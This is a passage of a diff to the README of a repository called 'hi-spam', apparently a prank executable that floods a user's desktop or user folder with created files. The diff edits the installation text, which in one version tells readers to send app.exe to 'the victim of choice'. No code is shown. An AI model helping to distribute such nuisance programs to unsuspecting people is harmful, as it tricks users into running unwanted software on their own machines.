zaherbaveaur/hi-spam/README.md

 instead of creating the files in their user folder, it creates them on the desktop so they can watch the chaos unfold

 ## Installation
-for those of you that are stupid just go into the *regular* or *desktop* folders in the repo and grab the app.exe file and send it to the victim of choice
+for those of you that are stupid just click release on the right of ur screen and download either *regular* or *desktop*

 or if you want the whole repo just clone it by typing
 ```